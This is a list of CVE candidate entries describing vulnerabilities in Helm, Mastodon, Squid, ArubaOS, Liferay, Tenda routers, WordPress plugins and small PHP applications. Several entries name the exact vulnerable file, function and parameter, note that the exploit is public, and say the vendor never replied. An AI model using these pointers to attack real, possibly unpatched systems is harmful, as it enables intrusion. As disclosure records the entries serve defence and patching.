CVE 2024 25620 Candidate Helm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources. When either the Helm client or SDK is used to save a chart whose name within the `Chart.yaml` file includes a relative path change, the chart would be saved outside its expected directory based on the changes in the relative path. The validation and linting did not detect the path changes in the name. This issue has been resolved in Helm v3.14.1. Users unable to upgrade should check all charts used by Helm for path changes in their name as found in the `Chart.yaml` file. This includes dependencies. MISC:https://github.com/helm/helm/commit/0d0f91d1ce277b2c8766cdc4c7aa04dbafbf2503 | URL:https://github.com/helm/helm/commit/0d0f91d1ce277b2c8766cdc4c7aa04dbafbf2503 | MISC:https://github.com/helm/helm/security/advisories/GHSA-v53g-5gjp-272r | URL:https://github.com/helm/helm/security/advisories/GHSA-v53g-5gjp-272r Assigned (20240208)
CVE 2024 2562 Candidate A vulnerability, which was classified as critical, was found in PandaXGO PandaX up to 20240310. This affects the function InsertRole of the file /apps/system/services/role_menu.go. The manipulation of the argument roleKey leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257061 was assigned to this vulnerability. MISC:VDB-257061 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257061 | MISC:VDB-257061 | PandaXGO PandaX role_menu.go InsertRole sql injection | URL:https://vuldb.com/?id.257061 | MISC:https://github.com/PandaXGO/PandaX/issues/4 | URL:https://github.com/PandaXGO/PandaX/issues/4 Assigned (20240316)
CVE 2024 25619 Candidate Mastodon is a free, open-source social network server based on ActivityPub. When an OAuth Application is destroyed, the streaming server wasn't being informed that the Access Tokens had also been destroyed, this could have posed security risks to users by allowing an application to continue listening to streaming after the application had been destroyed. Essentially this comes down to the fact that when Doorkeeper sets up the relationship between Applications and Access Tokens, it uses a `dependent: delete_all` configuration, which means the `after_commit` callback setup on `AccessTokenExtension` didn't actually fire, since `delete_all` doesn't trigger ActiveRecord callbacks. To mitigate, we need to add a `before_destroy` callback to `ApplicationExtension` which announces to streaming that all the Application's Access Tokens are being "killed". Impact should be negligible given the affected application had to be owned by the user. None the less this issue has been addressed in versions 4.2.6, 4.1.14, 4.0.14, and 3.5.18. Users are advised to upgrade. There are no known workaround for this vulnerability. MISC:https://github.com/mastodon/mastodon/commit/68eaa804c9bafdc5f798e114e9ba00161425dd71 | URL:https://github.com/mastodon/mastodon/commit/68eaa804c9bafdc5f798e114e9ba00161425dd71 | MISC:https://github.com/mastodon/mastodon/security/advisories/GHSA-7w3c-p9j8-mq3x | URL:https://github.com/mastodon/mastodon/security/advisories/GHSA-7w3c-p9j8-mq3x Assigned (20240208)
CVE 2024 25618 Candidate Mastodon is a free, open-source social network server based on ActivityPub. Mastodon allows new identities from configured authentication providers (CAS, SAML, OIDC) to attach to existing local users with the same e-mail address. This results in a possible account takeover if the authentication provider allows changing the e-mail address or multiple authentication providers are configured. When a user logs in through an external authentication provider for the first time, Mastodon checks the e-mail address passed by the provider to find an existing account. However, using the e-mail address alone means that if the authentication provider allows changing the e-mail address of an account, the Mastodon account can immediately be hijacked. All users logging in through external authentication providers are affected. The severity is medium, as it also requires the external authentication provider to misbehave. However, some well-known OIDC providers (like Microsoft Azure) make it very easy to accidentally allow unverified e-mail changes. Moreover, OpenID Connect also allows dynamic client registration. This issue has been addressed in versions 4.2.6, 4.1.14, 4.0.14, and 3.5.18. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/mastodon/mastodon/commit/b31af34c9716338e4a32a62cc812d1ca59e88d15 | URL:https://github.com/mastodon/mastodon/commit/b31af34c9716338e4a32a62cc812d1ca59e88d15 | MISC:https://github.com/mastodon/mastodon/security/advisories/GHSA-vm39-j3vx-pch3 | URL:https://github.com/mastodon/mastodon/security/advisories/GHSA-vm39-j3vx-pch3 Assigned (20240208)
CVE 2024 25617 Candidate Squid is an open source caching proxy for the Web supporting HTTP, HTTPS, FTP, and more. Due to a Collapse of Data into Unsafe Value bug ,Squid may be vulnerable to a Denial of Service attack against HTTP header parsing. This problem allows a remote client or a remote server to perform Denial of Service when sending oversized headers in HTTP messages. In versions of Squid prior to 6.5 this can be achieved if the request_header_max_size or reply_header_max_size settings are unchanged from the default. In Squid version 6.5 and later, the default setting of these parameters is safe. Squid will emit a critical warning in cache.log if the administrator is setting these parameters to unsafe values. Squid will not at this time prevent these settings from being changed to unsafe values. Users are advised to upgrade to version 6.5. There are no known workarounds for this vulnerability. This issue is also tracked as SQUID-2024:2 CONFIRM:https://security.netapp.com/advisory/ntap-20240322-0006/ | MISC:https://github.com/squid-cache/squid/commit/72a3bbd5e431597c3fdb56d752bc56b010ba3817 | URL:https://github.com/squid-cache/squid/commit/72a3bbd5e431597c3fdb56d752bc56b010ba3817 | MISC:https://github.com/squid-cache/squid/security/advisories/GHSA-h5x6-w8mv-xfpr | URL:https://github.com/squid-cache/squid/security/advisories/GHSA-h5x6-w8mv-xfpr Assigned (20240208)
CVE 2024 25616 Candidate Aruba has identified certain configurations of ArubaOS that can lead to partial disclosure of sensitive information in the IKE_AUTH negotiation process. The scenarios in which disclosure of potentially sensitive information can occur are complex, and depend on factors beyond the control of attackers. MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt | URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt Assigned (20240208)
CVE 2024 25615 Candidate An unauthenticated Denial-of-Service (DoS) vulnerability exists in the Spectrum service accessed via the PAPI protocol in ArubaOS 8.x. Successful exploitation of this vulnerability results in the ability to interrupt the normal operation of the affected service. MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt | URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt Assigned (20240208)
CVE 2024 25614 Candidate There is an arbitrary file deletion vulnerability in the CLI used by ArubaOS. Successful exploitation of this vulnerability results in the ability to delete arbitrary files on the underlying operating system, which could lead to denial-of-service conditions and impact the integrity of the controller. MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt | URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt Assigned (20240208)
CVE 2024 25613 Candidate Authenticated command injection vulnerabilities exist in the ArubaOS command line interface. Successful exploitation of these vulnerabilities result in the ability to execute arbitrary commands as a privileged user on the underlying operating system. MISC:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt | URL:https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2024-002.txt Assigned (20240208)
CVE 2024 25610 Candidate In Liferay Portal 7.2.0 through 7.4.3.12, and older unsupported versions, and Liferay DXP 7.4 before update 9, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions, the default configuration does not sanitize blog entries of JavaScript, which allows remote authenticated users to inject arbitrary web script or HTML (XSS) via a crafted payload injected into a blog entry’s content text field. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25610 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25610 Assigned (20240208)
CVE 2024 2561 Candidate A vulnerability, which was classified as critical, has been found in 74CMS 3.28.0. Affected by this issue is the function sendCompanyLogo of the file /controller/company/Index.php#sendCompanyLogo of the component Company Logo Handler. The manipulation of the argument imgBase64 leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257060. MISC:VDB-257060 | 74CMS Company Logo Index.php#sendCompanyLogo unrestricted upload | URL:https://vuldb.com/?id.257060 | MISC:VDB-257060 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257060 | MISC:https://gist.github.com/Southseast/9f5284d8ee0f6d91e72eef73b285512a | URL:https://gist.github.com/Southseast/9f5284d8ee0f6d91e72eef73b285512a Assigned (20240316)
CVE 2024 25609 Candidate HtmlUtil.escapeRedirect in Liferay Portal 7.2.0 through 7.4.3.12, and older unsupported versions, and Liferay DXP 7.4 before update 9, 7.3 service pack 3, 7.2 fix pack 15 through 18, and older unsupported versions can be circumvented by using two forward slashes, which allows remote attackers to redirect users to arbitrary external URLs via the (1) 'redirect` parameter (2) `FORWARD_URL` parameter, and (3) others parameters that rely on HtmlUtil.escapeRedirect. This vulnerability is the result of an incomplete fix in CVE-2022-28977. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25609 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25609 Assigned (20240208)
CVE 2024 25608 Candidate HtmlUtil.escapeRedirect in Liferay Portal 7.2.0 through 7.4.3.18, and older unsupported versions, and Liferay DXP 7.4 before update 19, 7.3 before update 4, 7.2 before fix pack 19, and older unsupported versions can be circumvented by using the 'REPLACEMENT CHARACTER' (U+FFFD), which allows remote attackers to redirect users to arbitrary external URLs via the (1) 'redirect` parameter (2) `FORWARD_URL` parameter, (3) `noSuchEntryRedirect` parameter, and (4) others parameters that rely on HtmlUtil.escapeRedirect. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25608 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25608 Assigned (20240208)
CVE 2024 25607 Candidate The default password hashing algorithm (PBKDF2-HMAC-SHA1) in Liferay Portal 7.2.0 through 7.4.3.15, and older unsupported versions, and Liferay DXP 7.4 before update 16, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions defaults to a low work factor, which allows attackers to quickly crack password hashes. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25607 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25607 Assigned (20240208)
CVE 2024 25606 Candidate XXE vulnerability in Liferay Portal 7.2.0 through 7.4.3.7, and older unsupported versions, and Liferay DXP 7.4 before update 4, 7.3 before update 12, 7.2 before fix pack 20, and older unsupported versions allows attackers with permission to deploy widgets/portlets/extensions to obtain sensitive information or consume system resources via the Java2WsddTask._format method. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25606 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25606 Assigned (20240208)
CVE 2024 25605 Candidate The Journal module in Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions grants guest users view permission to web content templates by default, which allows remote attackers to view any template via the UI or API. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25605 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25605 Assigned (20240208)
CVE 2024 25604 Candidate Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions does not properly check user permissions, which allows remote authenticated users with the VIEW user permission to edit their own permission via the User and Organizations section of the Control Panel. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25604 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25604 Assigned (20240208)
CVE 2024 25603 Candidate Stored cross-site scripting (XSS) vulnerability in the Dynamic Data Mapping module's DDMForm in Liferay Portal 7.2.0 through 7.4.3.4, and older unsupported versions, and Liferay DXP 7.4.13, 7.3 before update 4, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via the instanceId parameter. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25603 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25603 Assigned (20240208)
CVE 2024 25602 Candidate Stored cross-site scripting (XSS) vulnerability in Users Admin module's edit user page in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into an organization’s “Name” text field MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25602 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25602 Assigned (20240208)
CVE 2024 25601 Candidate Stored cross-site scripting (XSS) vulnerability in Expando module's geolocation custom fields in Liferay Portal 7.2.0 through 7.4.2, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 17, and older unsupported versions allows remote authenticated users to inject arbitrary web script or HTML via a crafted payload injected into the name text field of a geolocation custom field. MISC:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25601 | URL:https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/cve-2024-25601 Assigned (20240208)
CVE 2024 2560 Candidate A vulnerability classified as problematic was found in Tenda AC18 15.03.05.05. Affected by this vulnerability is the function fromSysToolRestoreSet of the file /goform/SysToolRestoreSet. The manipulation leads to cross-site request forgery. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257059. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257059 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257059 | MISC:VDB-257059 | Tenda AC18 SysToolRestoreSet fromSysToolRestoreSet cross-site request forgery | URL:https://vuldb.com/?id.257059 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromSysToolRestoreSet.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromSysToolRestoreSet.md Assigned (20240316)
CVE 2024 25598 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Livemesh Livemesh Addons for Elementor allows Stored XSS.This issue affects Livemesh Addons for Elementor: from n/a through 8.3. MISC:https://patchstack.com/database/vulnerability/addons-for-elementor/wordpress-elementor-addons-by-livemesh-plugin-8-3-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/addons-for-elementor/wordpress-elementor-addons-by-livemesh-plugin-8-3-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240208)
CVE 2024 25597 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Etoile Web Design Ultimate Reviews allows Stored XSS.This issue affects Ultimate Reviews: from n/a through 3.2.8. MISC:https://patchstack.com/database/vulnerability/ultimate-reviews/wordpress-ultimate-reviews-plugin-3-2-8-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/ultimate-reviews/wordpress-ultimate-reviews-plugin-3-2-8-unauthenticated-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240208)
CVE 2024 25596 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Doofinder Doofinder for WooCommerce allows Stored XSS.This issue affects Doofinder for WooCommerce: from n/a through 2.1.8. MISC:https://patchstack.com/database/vulnerability/doofinder-for-woocommerce/wordpress-doofinder-for-woocommerce-plugin-2-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/doofinder-for-woocommerce/wordpress-doofinder-for-woocommerce-plugin-2-1-8-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240208)
CVE 2024 25594 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Savvy WordPress Development MyWaze allows Stored XSS.This issue affects MyWaze: from n/a through 1.6. MISC:https://patchstack.com/database/vulnerability/my-waze/wordpress-mywaze-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/my-waze/wordpress-mywaze-plugin-1-6-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240208)
CVE 2024 25593 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Basix NEX-Forms – Ultimate Form Builder allows Stored XSS.This issue affects NEX-Forms – Ultimate Form Builder: from n/a through 8.5.5. MISC:https://patchstack.com/database/vulnerability/nex-forms-express-wp-form-builder/wordpress-nex-forms-plugin-8-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/nex-forms-express-wp-form-builder/wordpress-nex-forms-plugin-8-5-5-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240208)
CVE 2024 25592 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in WPMU DEV Broken Link Checker allows Stored XSS.This issue affects Broken Link Checker: from n/a through 2.2.3. MISC:https://patchstack.com/database/vulnerability/broken-link-checker/wordpress-broken-link-checker-plugin-2-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/broken-link-checker/wordpress-broken-link-checker-plugin-2-2-3-cross-site-scripting-xss-vulnerability?_s_id=cve Assigned (20240208)
CVE 2024 25591 Candidate Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Benjamin Rojas WP Editor.This issue affects WP Editor: from n/a through 1.2.7. MISC:https://patchstack.com/database/vulnerability/wp-editor/wordpress-wp-editor-plugin-1-2-7-sensitive-data-exposure-vulnerability?_s_id=cve | URL:https://patchstack.com/database/vulnerability/wp-editor/wordpress-wp-editor-plugin-1-2-7-sensitive-data-exposure-vulnerability?_s_id=cve Assigned (20240208)
CVE 2024 2559 Candidate A vulnerability classified as problematic has been found in Tenda AC18 15.03.05.05. Affected is the function fromSysToolReboot of the file /goform/SysToolReboot. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257058 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257058 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257058 | MISC:VDB-257058 | Tenda AC18 SysToolReboot fromSysToolReboot cross-site request forgery | URL:https://vuldb.com/?id.257058 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromSysToolReboot.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/fromSysToolReboot.md Assigned (20240316)
CVE 2024 2558 Candidate A vulnerability was found in Tenda AC18 15.03.05.05. It has been rated as critical. This issue affects the function formexeCommand of the file /goform/execCommand. The manipulation of the argument cmdinput leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257057 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257057 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257057 | MISC:VDB-257057 | Tenda AC18 execCommand formexeCommand stack-based overflow | URL:https://vuldb.com/?id.257057 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formexeCommand.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/formexeCommand.md Assigned (20240316)
CVE 2024 25579 Candidate OS command injection vulnerability in ELECOM wireless LAN routers allows a network-adjacent attacker with an administrative privilege to execute arbitrary OS commands by sending a specially crafted request to the product. Affected products and versions are as follows: WRC-1167GS2-B v1.67 and earlier, WRC-1167GS2H-B v1.67 and earlier, WRC-2533GS2-B v1.62 and earlier, WRC-2533GS2-W v1.62 and earlier, and WRC-2533GS2V-B v1.62 and earlier. MISC:https://jvn.jp/en/vu/JVNVU99444194/ | URL:https://jvn.jp/en/vu/JVNVU99444194/ | MISC:https://www.elecom.co.jp/news/security/20240220-01/ | URL:https://www.elecom.co.jp/news/security/20240220-01/ Assigned (20240215)
CVE 2024 25578 Candidate MicroDicom DICOM Viewer versions 2023.3 (Build 9342) and prior contain a lack of proper validation of user-supplied data, which could result in memory corruption within the application. MISC:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01 | URL:https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-060-01 Assigned (20240212)
CVE 2024 2557 Candidate A vulnerability was found in kishor-23 Food Waste Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/admin.php. The manipulation leads to improper authorization. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257056. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257056 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257056 | MISC:VDB-257056 | kishor-23 Food Waste Management System admin.php improper authorization | URL:https://vuldb.com/?id.257056 | MISC:https://github.com/vanitashtml/CVE-Dumps/blob/main/Execute%20After%20Redirect%20-%20Food%20Management%20System.md | URL:https://github.com/vanitashtml/CVE-Dumps/blob/main/Execute%20After%20Redirect%20-%20Food%20Management%20System.md Assigned (20240316)
CVE 2024 25567 Candidate Path traversal attack is possible and write outside of the intended directory and may access sensitive information. If a file name is specified that already exists on the file system, then the original file will be overwritten. MISC:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 | URL:https://www.cisa.gov/news-events/ics-advisories/icsa-24-074-12 Assigned (20240312)
CVE 2024 2556 Candidate A vulnerability was found in SourceCodester Employee Task Management System 1.0. It has been classified as critical. This affects an unknown part of the file attendance-info.php. The manipulation of the argument user_id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257055. MISC:VDB-257055 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257055 | MISC:VDB-257055 | SourceCodester Employee Task Management System attendance-info.php sql injection | URL:https://vuldb.com/?id.257055 | MISC:https://github.com/tht1997/WhiteBox/blob/main/sourcecodesters/employee-management-system-php-attendance-info.md | URL:https://github.com/tht1997/WhiteBox/blob/main/sourcecodesters/employee-management-system-php-attendance-info.md Assigned (20240316)
CVE 2024 25559 Candidate URL spoofing vulnerability exists in a-blog cms Ver.3.1.0 to Ver.3.1.8. If an attacker sends a specially crafted request, the administrator of the product may be forced to access an arbitrary website when clicking a link in the audit log. MISC:https://developer.a-blogcms.jp/blog/news/JVN-48966481.html | URL:https://developer.a-blogcms.jp/blog/news/JVN-48966481.html | MISC:https://jvn.jp/en/jp/JVN48966481/ | URL:https://jvn.jp/en/jp/JVN48966481/ Assigned (20240208)
CVE 2024 25552 Candidate A local attacker can gain administrative privileges by inserting an executable file in the path of the affected product. MISC:https://cert.vde.com/en/advisories/VDE-2024-018 | URL:https://cert.vde.com/en/advisories/VDE-2024-018 Assigned (20240207)
CVE 2024 25551 Candidate Cross Site Scripting (XSS) vulnerability in sourcecodester Simple Student Attendance System v1.0 allows attackers to execute arbitrary code via crafted GET request to web application URL. MISC:https://medium.com/@jose.inaciot/my-first-cve-cve-2024-25551-f91787c05ae9 Assigned (20240207)
CVE 2024 2555 Candidate A vulnerability was found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file update-admin.php. The manipulation of the argument admin_id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-257054 is the identifier assigned to this vulnerability. MISC:VDB-257054 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257054 | MISC:VDB-257054 | SourceCodester Employee Task Management System update-admin.php sql injection | URL:https://vuldb.com/?id.257054 | MISC:https://github.com/Peanut886/Vulnerability/blob/main/webray.com.cn/2024/Task%20Management%20System%20-%20multiple%20vulnerabilities.md#4sql-injection-vulnerability-in-update-adminphp | URL:https://github.com/Peanut886/Vulnerability/blob/main/webray.com.cn/2024/Task%20Management%20System%20-%20multiple%20vulnerabilities.md#4sql-injection-vulnerability-in-update-adminphp Assigned (20240316)
CVE 2024 2554 Candidate A vulnerability has been found in SourceCodester Employee Task Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file update-employee.php. The manipulation of the argument admin_id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257053 was assigned to this vulnerability. MISC:VDB-257053 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257053 | MISC:VDB-257053 | SourceCodester Employee Task Management System update-employee.php sql injection | URL:https://vuldb.com/?id.257053 | MISC:https://github.com/Peanut886/Vulnerability/blob/main/webray.com.cn/2024/Task%20Management%20System%20-%20multiple%20vulnerabilities.md#3sql-injection-vulnerability-in-update-employeephp | URL:https://github.com/Peanut886/Vulnerability/blob/main/webray.com.cn/2024/Task%20Management%20System%20-%20multiple%20vulnerabilities.md#3sql-injection-vulnerability-in-update-employeephp Assigned (20240316)
CVE 2024 2553 Candidate A vulnerability, which was classified as problematic, was found in SourceCodester Product Review Rating System 1.0. Affected is an unknown function of the component Rate Product Handler. The manipulation of the argument Your Name/Comment leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257052. MISC:VDB-257052 | CTI Indicators (IOB, IOC, TTP, IOA) | URL:https://vuldb.com/?ctiid.257052 | MISC:VDB-257052 | SourceCodester Product Review Rating System Rate Product cross site scripting | URL:https://vuldb.com/?id.257052 | MISC:https://github.com/BurakSevben/CVEs/blob/main/Product%20Rating%20System/Product%20Rating%20System%20-%20Cross-Site-Scripting-1.md | URL:https://github.com/BurakSevben/CVEs/blob/main/Product%20Rating%20System/Product%20Rating%20System%20-%20Cross-Site-Scripting-1.md Assigned (20240316)
CVE 2024 25502 Candidate Directory Traversal vulnerability in flusity CMS v.2.4 allows a remote attacker to execute arbitrary code and obtain sensitive information via the download_backup.php component. MISC:https://github.com/flusity/flusity-CMS/issues/10 Assigned (20240207)
CVE 2024 25501 Candidate An issue WinMail v.7.1 and v.5.1 and before allows a remote attacker to execute arbitrary code via a crafted script to the email parameter. MISC:https://gist.github.com/Drun1baby/8270239bed2952dbd99cc8d4262728e8 Assigned (20240207)
CVE 2024 2547 Candidate A vulnerability was found in Tenda AC18 15.03.05.05 and classified as critical. Affected by this issue is the function R7WebsSecurityHandler. The manipulation of the argument password leads to stack-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257000. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-257000 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.257000 | MISC:VDB-257000 | Tenda AC18 R7WebsSecurityHandler stack-based overflow | URL:https://vuldb.com/?id.257000 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/R7WebsSecurityHandler.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/AC18/R7WebsSecurityHandler.md Assigned (20240315)
CVE 2024 25469 Candidate SQL Injection vulnerability in CRMEB crmeb_java v.1.3.4 and before allows a remote attacker to obtain sensitive information via the latitude and longitude parameters in the api/front/store/list component. MISC:https://github.com/crmeb/crmeb_java/ | MISC:https://github.com/crmeb/crmeb_java/issues/20 Assigned (20240207)
CVE 2024 25468 Candidate An issue in TOTOLINK X5000R V.9.1.0u.6369_B20230113 allows a remote attacker to cause a denial of service via the host_time parameter of the NTPSyncWithHost component. MISC:https://github.com/thKim0/totolink Assigned (20240207)
CVE 2024 25466 Candidate Directory Traversal vulnerability in React Native Document Picker before v.9.1.1 and fixed in v.9.1.1 allows a local attacker to execute arbitrary code via a crafted script to the Android library component. MISC:https://github.com/FixedOctocat/CVE-2024-25466/tree/main | MISC:https://github.com/rnmods/react-native-document-picker/blob/0be5a70c3b456e35c2454aaf4dc8c2d40eb2ab47/android/src/main/java/com/reactnativedocumentpicker/RNDocumentPickerModule.java Assigned (20240207)
CVE 2024 25461 Candidate Directory Traversal vulnerability in Terrasoft, Creatio Terrasoft CRM v.7.18.4.1532 allows a remote attacker to obtain sensitive information via a crafted request to the terrasoft.axd component. MISC:https://safe-surf.ru/specialists/news/697426/ | MISC:https://safe-surf.ru/upload/ALRT/ALRT-20230808.1.pdf Assigned (20240207)
CVE 2024 2546 Candidate A vulnerability has been found in Tenda AC18 15.13.07.09 and classified as critical. Affected by this vulnerability is the function fromSetWirelessRepeat. The manipulation of the argument wpapsk_crypto5g leads to stack-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-256999. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. MISC:VDB-256999 | CTI Indicators (IOB, IOC, IOA) | URL:https://vuldb.com/?ctiid.256999 | MISC:VDB-256999 | Tenda AC18 fromSetWirelessRepeat stack-based overflow | URL:https://vuldb.com/?id.256999 | MISC:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/A18/fromSetWirelessRepeat_a.md | URL:https://github.com/abcdefg-png/IoT-vulnerable/blob/main/Tenda/A18/fromSetWirelessRepeat_a.md Assigned (20240315)
CVE 2024 25454 Candidate Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_DescriptorFinder::Test() function. MISC:https://github.com/axiomatic-systems/Bento4/issues/875 Assigned (20240207)
CVE 2024 25453 Candidate Bento4 v1.6.0-640 was discovered to contain a NULL pointer dereference via the AP4_StszAtom::GetSampleSize() function. MISC:https://github.com/axiomatic-systems/Bento4/issues/204 | MISC:https://github.com/axiomatic-systems/Bento4/issues/874 Assigned (20240207)
CVE 2024 25452 Candidate Bento4 v1.6.0-640 was discovered to contain an out-of-memory bug via the AP4_UrlAtom::AP4_UrlAtom() function. MISC:https://github.com/axiomatic-systems/Bento4/issues/873 Assigned (20240207)
